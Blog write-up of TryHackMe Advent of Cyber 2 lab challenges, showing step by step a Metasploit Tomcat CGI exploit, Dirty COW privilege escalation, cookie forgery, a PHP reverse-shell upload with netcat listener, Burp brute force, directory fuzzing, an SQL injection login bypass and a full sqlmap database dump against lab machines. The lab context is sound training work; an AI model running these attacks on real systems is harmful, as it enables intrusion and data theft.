Nmap scan report for ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Host is up (0.011s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
8080/tcp open  http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.60%I=7%D=12/13%Time=5FD5EBF5%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2000,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;char
SF:set=UTF-8\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:53\x20GMT\r\nC
SF:onnection:\x20close\r\n\r\n\r\n\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20l
SF:ang=\"en\">\r\n\x20\x20\x20\x20<head>\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<meta\x20charset=\"UTF-8\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:title>Apache\x20Tomcat/9\.0\.17</title>\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20<link\x20href=\"favicon\.ico\"\x20rel=\"icon\"\x20type=\"image/x-ic
SF:on\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"favicon\.
SF:ico\"\x20rel=\"shortcut\x20icon\"\x20type=\"image/x-icon\"\x20/>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"tomcat\.css\"\x20rel=\"sty
SF:lesheet\"\x20type=\"text/css\"\x20/>\r\n\x20\x20\x20\x20</head>\r\n\r\n
SF:\x20\x20\x20\x20<body>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\"
SF:wrapper\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20i
SF:d=\"navigation\"\x20class=\"curved\x20container\">\r\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"nav-home\"
SF:><a\x20href=\"https://tomcat\.apache\.org/\">Home</a></span>\r\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"
SF:nav-hosts\"><a\x20href=\"/docs/\">Documentation</a></span>\r\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"na
SF:v-config\"><a\x20href=\"/docs/config/\">Configuration</a></span>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20i
SF:d=\"nav-examples\"><a\x20href=\"/examples/\">Examples")%r(HTTPOptions,7
SF:D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HEAD,\x20POST,\x20OPTIONS\
SF:r\nContent-Length:\x200\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:
SF:54\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,8CB,"HTTP/1\.
SF:1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lan
SF:guage:\x20en\r\nContent-Length:\x202114\r\nDate:\x20Sun,\x2013\x20Dec\x
SF:202020\x2010:24:54\x20GMT\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"
SF:><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTTP\x20Version\
SF:x20Not\x20Supported</title><style\x20type=\"text/css\">h1\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-si
SF:ze:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;font-size:16px;}\x20h3\x20{font-family:Tahoma,Ari
SF:al,sans-serif;color:white;background-color:#525D76;font-size:14px;}\x20
SF:body\x20{font-family:Tahoma,Arial,sans-serif;color:black;background-col
SF:or:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,sans-serif;ba
SF:ckground:white;color:black;font-size:12px;}\x20a\x20{color:black;}\x20a
SF:\.name\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525
SF:D76;border:none;}</style></head><body><h");
MAC Address: 02:34:E1:B1:70:6F (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.07 seconds
           Raw packets sent: 3011 (132.468KB) | Rcvd: 20 (872B)

Looks like there is a webserver running on port 8080. Let’s look at it by pulling it up in the browser.

Here we can see what version of tomcat is running. Now we start metasploit with msfconsole

search tomcat list a number of explots metasploit provides for tomcat. info path allows us to view the details of an explot.

The one that seems promising is info exploit/windows/http/tomcat_cgi_cmdlineargs

msf5 > info exploit/windows/http/tomcat_cgi_cmdlineargs

       Name: Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
     Module: exploit/windows/http/tomcat_cgi_cmdlineargs
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-04-10

Provided by:
  Yakov Shafranovich
  sinn3r <sinn3r@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Apache Tomcat 9.0 or prior for Windows

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI path to CGI script
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Apache Tomcat's CGIServlet 
  component. When the enableCmdLineArguments setting is set to true, a 
  remote user can abuse this to execute system commands, and gain 
  remote code execution.

References:
  https://cvedetails.com/cve/CVE-2019-0232/
  Remote Code Execution (RCE) in CGI Servlet – Apache Tomcat on Windows – CVE-2019-0232
  https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/

We select it with use exploit/windows/http/tomcat_cgi_cmdlineargs

options shows us the available settings for this exploit. First we double check that LHOST is our attack box IP.

Then we set the RHOST to the servers IP. set RHOST 10.10.83.199

Now we need a file in the cgi folder. Following the challenge description we can find http://10.10.83.199:8080/cgi-bin/elfwhacker.bat We use set TARGETURI /cgi-bin/elfwhacker.bat and doube check our options.

When everything is fine, we issue exploit to start the attack.

We are now in a meterpreter session on the server. with dir we can list the directory content.

meterpreter > dir
Listing: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin
============================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2020-12-13 10:56:07 +0000  cyGMM.exe
100777/rwxrwxrwx  825    fil   2020-11-19 03:49:25 +0000  elfwhacker.bat
100666/rw-rw-rw-  27     fil   2020-11-19 22:05:43 +0000  flag1.txt

We can cat the flad file ad finish the challenge. There is more to explore here and you should use the opportunity to play around with metasploit and privilege escalation.

Day 13: Coal For Christmas

As always, hit the deploy buttons. Once everything is booted up, we run a quick nmap scan.

root@ip-10-10-224-179:~# nmap 10.10.34.134

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-14 10:58 GMT
Nmap scan report for ip-10-10-34-134.eu-west-1.compute.internal (10.10.34.134)
Host is up (0.00082s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
23/tcp  open  telnet
111/tcp open  rpcbind
MAC Address: 02:91:2C:86:CD:15 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds

Telnet is a insecure predecessor of ssh. So lets connect with telnet 10.10.34.134 23. Luckily for us, we are provided with cenential in the greeting text.

First thing we do is getting a idea of what system we are dealing with.

$ uname -a
Linux christmas 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

With ls we have a look at what files we have in our hom folder.

$ ls
christmas.sh  cookies_and_milk.txt

Looking at cookies_and_milk.txt we will be able to answer Question of who got there first.

The challenge asks us to learn about DirtyCow. Let’s do that.

On the site you can find a link to the code of the Dirty Cow explot. To get the code of the box, I create a new file with nano dirty.c and copy paste the source. CTRL+O saves the file, CTRL+X closes the editor.

In the comment header of the sourcecode we just copied, it is explained how to complile the exploit. So lets do that with gcc -pthread dirty.c -o dirty -lcrypt.

Now we run the explot. In my case, I went for the absolutely insecure password of foo when prompted.

$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash

mmap: 7f9ccb251000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

With su firefart we change what user we are running as. cd ~ brings us to the home of firefart. In there we find message_from_the_grinch.txt.

firefart@christmas:~# cat message_from_the_grinch.txt
Nice work, Santa!

Wow, this house sure was DIRTY!
I think they deserve coal for Christmas, don't you?
So let's leave some coal under the Christmas `tree`!

Let's work together on this. Leave this text file here,
and leave the christmas.sh script here too...
but, create a file named `coal` in this directory!
Then, inside this directory, pipe the output
of the `tree` command into the `md5sum` command.

The output of that command (the hash itself) is
the flag you can submit to complete this task
for the Advent of Cyber!

    - Yours,
        John Hammond
        er, sorry, I mean, the Grinch

      - THE GRINCH, SERIOUSLY

Following the instructions we use touch coal to create the coal file, then run tree | md5sum to get the final answer.

TryHackMe – Advent of Cyber 2 Day 1-6 – Web Exploitation [Writeup]

Advent of Cyber 2 is a free, holiday season themed room on TryHackMe all you need to get started is an account.

A new challenge is being released every day and I will update this blog post after I completed the next day.

Day 1 – A Christmas Crisis

Deploy the attack machine and the challenge by clicking the green buttons. Then open the browser of the attack box and enter the IP of the deployed challenge box.

Now create a user by typing in a username & password then clicking register. Now log in.

Toggle on the developer tools of the browser with ctrl-shift-i. And navigate to the data panel. Here you can see the cookie name and value.

Looking at the value you can either know by experience what kind of encoding is use. Or, if you have no idea you can pull up cyberchef, paste in the value and try out a few of the favorites.

Hint: the answer is the full name of the encoding, not just the three letter short handle.

For my username of foobar the cookie decodes to:

{"company":"The Best Festival Company", "username":"foobar"}

This is the JSON format. (Sorry, no idea to be less obvious about it.)

To get Santa’s cookie, we now need to change the username in the JSON to santa and encode that JSON into Hex again. You can do that in CyberChef as well. Make sure to select a delimiter of none.

Now we go back to the assembly line website and out developer tools. We replace the value of the auth cookie with what we just calculated, then reload the page.

Now we can turn on the assembly line again and when all switches are flipped on, the final flag is revealed.

Day 2 – The Elf Strikes Back!

As always we start with deploying both the attack box and the challenge server.

First we bring up the IP of the challenge in our browser. The website pretty much tells us what to do next. We add ?id=YOUR_ID_HERE to the url and replace YOUR_ID_HERE with the code provided the challenge description.

This leads us to the upload page.

Checking the file types in the upload dialog or the source code will reveal, that the website is accepting .jpeg, .jpg and .png file. Those all are common image formats.

The Walk-through / challenge asks us now to upload a reverse shell. The briefing even tells us what reverse shell.

But let us quickly talk about how we can find out what kind of reverse shell we should try. First we need to know what programming language is being run by the server. If we are lucky, like in this case, we get that information via the http header.

To view the header, we open up the developer tools again and head to the network tab. After a reload of the page, it should populate. We click on the main file, the one with our id, then select headers on the right panel. Scrolling through the headers we can find X-Powered-By: PHP/7.2.24

This tells us we are looking for a php reverse shell, just as suggested in the challenge.

As suggested in the guide, we copy the reverse sehll with cp /usr/share/webshells/php/php-reverse-shell.php . in the terminal to our working directory. Then we run subl php-reverse-shell.php to open the reverse shell code in sublime text.

Now we change line 49 and replace the placeholder with the IP of our attack box. We can find that IP right in the top of the try hackme page. We also change the port in line 50 to the suggested 4444. As long as we use a free, high number port we can choose whatever we like here, we just have to make sure to use the same port when setting up the listener in the next step.

After saving the file we switch back to the terminal and set up a netcat listener with sudo nc -lvnp 4444

Netcat is a tool that allows us to listen to and send network traffic. We need to run it with sudo (running it with root privileges) to make sure it has the permissions to open the port we specified.

Now we need to upload our reverse shell. But the websites does not accept .php file. We still need it to end in .php for the server to interpret the files as code and run it though.

That’s why we can try need to rename it to include one of the supported file types, for example let it end in .png.php

It uploads the file but we still have nothing on the terminal. We first have to get the server to execute out reverse shell. Sometimes you can get lucky and the uploaded file gets displayed right back to you. But this is not the case here.

So we need to find our reverse shell. It will be in some kind of upload directory on the server. We could use something like fuff and use a word list to find potential upload urls. But in this case, we can try and guess a few common ones. Like upload.

We can click our reverse shell there. The website probably will be stuck loading but we get back our shell in the terminal.

With /var/www/flag.txt we can display the final flag.

Day 3 – Christmas Chaos

This day very much follows the guide already outlined in the challenge, so I will keep this brief.

After starting the attack box and deploying the challenge, we first have a look at the website. It is a typical login form.

We launch burp suit, set the Firefox proxy to burp and set intercept in the burp proxy to on. We put in some test credentials and send them. Burp intercepts the request and we can have a look at it.

In the http history tab we can send the request to the burp intruder. In the positions tab in intruders we mark the positions. The two positions we need are the text data we had send.

Then we move to the payloads tab and enter the suggested word lists of the challenge. Switch between the two lists with the payload set drop down.

After clicking Start Attack and clicking away the community edition warning, we have a look at the results. There is only one that looks different.

We disable the intercept and try that set of credentials to log in. In that control panel we find the flag.

Day 4 – Santa’s Watching

After starting the attack box and deploying the challenge we can view the defaced site.

To solve the second question, read the documentation above, it should tell you how to construct the required command.

Now we try to find the API endpoint of the forum with gobuster. As suggested we use -w to specify the dirbuster big word list. We add the .php extension with -x. This is not needed to solve the challenge, it just put it in there because most forum software is written in php and so have been the previous challenges.

<code>gobuster dir -u http://10.10.79.210/ -w /usr/share/wordlists/dirb/big.txt -x .php</code>

In gobuster’s output we find /api with a 301 http code, indicating it has permanently moved. We pull the url up in the browser.

It redirects to /api/ , a folder on the server. It looks like the API is only containing one endpoint, site-log.php

The challenge tells us that the parameter for the endpoint is date. Usually we would have to find that one out by either fuzzing or reading documentation if that is availible for the software running.

So we fuzz it with wfuzz:

wfuzz -c -z file,/opt/AoC-2020/Day-4/wordlist -u http://10.10.79.210/api/site-log.php?date=FUZZ

In the output we see one of the results to have a different length. So we pull up the url with that parameter.

http://10.10.79.210/api/site-log.php?date=20201125

That will give us the flag and complete this day.

Day 5 – Someone stole Santa’s gift list!

First we pull of the site in the browser.

I very much recommend that you play around a bit with the SQL injection training site also hosted on port 3000 if you are new to SQL injections.

Next we are supposed to guess the panel name. Trying a few things will hopefully lead you eventually to santapanel

Now we can us an SQL injection to bypass the login page. We use santa as username and ' or true; -- as password. The ' end the string where the password is meant to be inerted. or true; adds another condition to the SQL statement. It now basically asks if the password matches or true. or true always leads to true so the comparisson with the password become irrelevant and we can log in with any existing user we specify. -- mark the rest of the original SQL querry as comment.

Our next task is to fins out how many entries the gift table has and what Paul wants. We can use the same payload ' or true; -- again. This time it does not invalidate the password, but the kids name. This way it puts out the gift for every kid. Now it just is a matter of counting and finding Pauls gift.

The screenshot is intentionally cropped to not reveal the answers. What we can see that the search terms are transmitted in the URL as GET parameter. This makes using a tool like SQL map rather easy. So instead of manually dumping the database to look for the flag and admin password, we use SQL map.

Firt we start up burp and switch the proxy in the browser to burp. Then we reload the panel with a default search, like shoes. We send the request in the burp proxy to the intruder, where we can save ti to disk. This allows us to use the cookie of our session ect. with SQLmap.

sqlmap -r gift --dump-all --tamper=space2comment

-r gift points sqlmap to the file saved from burp. I named mine gift but you might have chosen a different name.

--dump-all asks it to dump all data it can find

--tamper=space2comment is a simple WAF evasion technique something hinted at in the challenge. If you forget it, sqlmap will suggest it too though.

While it is running, sqlmap will prompt you for input. See the full dump below for details.

root@ip-10-10-172-235:~# sqlmap -r gift --dump-all --tamper=space2comment
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:09:08

[02:09:08] [INFO] parsing HTTP request from 'gift'
[02:09:08] [INFO] loading tamper script 'space2comment'
[02:09:08] [INFO] testing connection to the target URL
[02:09:08] [INFO] testing if the target URL content is stable
[02:09:09] [INFO] target URL content is stable
[02:09:09] [INFO] testing if GET parameter 'search' is dynamic
[02:09:09] [INFO] confirming that GET parameter 'search' is dynamic
[02:09:09] [INFO] GET parameter 'search' is dynamic
[02:09:09] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[02:09:09] [INFO] testing for SQL injection on GET parameter 'search'
[02:09:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:09:09] [WARNING] reflective value(s) found and filtering out
[02:09:09] [INFO] GET parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="James")
[02:09:09] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:09:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL inline queries'
[02:09:28] [INFO] testing 'PostgreSQL inline queries'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[02:09:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:09:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:09:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:09:29] [INFO] testing 'Oracle AND time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:09:29] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[02:09:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:09:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:09:29] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:09:29] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[02:09:34] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 1 to 20 columns'
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 21 to 40 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 41 to 60 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 61 to 80 columns'
[02:09:36] [INFO] testing 'MySQL UNION query (39) - 81 to 100 columns'
[02:09:36] [INFO] checking if the injection point on GET parameter 'search' is a false positive
[02:09:36] [INFO] heuristics detected web page charset 'ascii'
[02:09:36] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 195 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=shoes%' AND 1839=1839 AND '%'='
---
[02:09:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:09:43] [INFO] testing MySQL
[02:09:43] [WARNING] the back-end DBMS is not MySQL
[02:09:43] [INFO] testing Oracle
[02:09:43] [WARNING] the back-end DBMS is not Oracle
[02:09:43] [INFO] testing PostgreSQL
[02:09:43] [WARNING] the back-end DBMS is not PostgreSQL
[02:09:43] [INFO] testing Microsoft SQL Server
[02:09:43] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:09:43] [INFO] testing SQLite
[02:09:43] [INFO] confirming SQLite
[02:09:43] [INFO] actively fingerprinting SQLite
[02:09:43] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[02:09:43] [INFO] sqlmap will dump entries of all tables from all databases now
[02:09:43] [INFO] fetching tables for database: 'SQLite_masterdb'
[02:09:43] [INFO] fetching number of tables for database 'SQLite_masterdb'
[02:09:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:09:43] [INFO] retrieved: 3
[02:09:43] [INFO] retrieved: users
[02:09:44] [INFO] retrieved: sequels
[02:09:45] [INFO] retrieved: hidden_table
[02:09:46] [INFO] retrieved: CREATE TABLE sequels (title text, kid text, age integer)
[02:09:54] [INFO] fetching entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] fetching number of entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] retrieved: 22
Database: SQLite_masterdb
Table: sequels
[22 entries]
+------+------+-------+
| kid  | age  | title |
+------+------+-------+
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
| NULL | NULL | NULL  |
+------+------+-------+

[02:09:54] [INFO] table 'SQLite_masterdb.sequels' dumped to CSV file '/root/.sqlmap/output/10.10.112.21/dump/SQLite_masterdb/sequels.csv'
[02:09:54] [INFO] retrieved: CREATE TABLE hidden_table (flag text)
[02:10:00] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] fetching number of entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] retrieved: 1
[02:10:00] [INFO] retrieved: thmfox{All_I_Want_for_Christmas_Is_You}
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
+-----------------------------------------+
| flag                                    |
+-----------------------------------------+
| Here will be the flag                   |
+-----------------------------------------+

[02:10:05] [INFO] table 'SQLite_masterdb.hidden_table' dumped to CSV file '/root/.sqlmap/output/10.10.112.21/dump/SQLite_masterdb/hidden_table.csv'
[02:10:05] [INFO] retrieved: CREATE TABLE users (username text, password text)
[02:10:09] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] fetching number of entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] retrieved: 1
[02:10:09] [INFO] retrieved: EhCNSWzzFP6sc7gB
[02:10:10] [INFO] retrieved: admin
Database: SQLite_masterdb
Table: users
[1 entry]
+----------+------------------+
| username | password         |
+----------+------------------+
| admin    | here password    |
+----------+------------------+

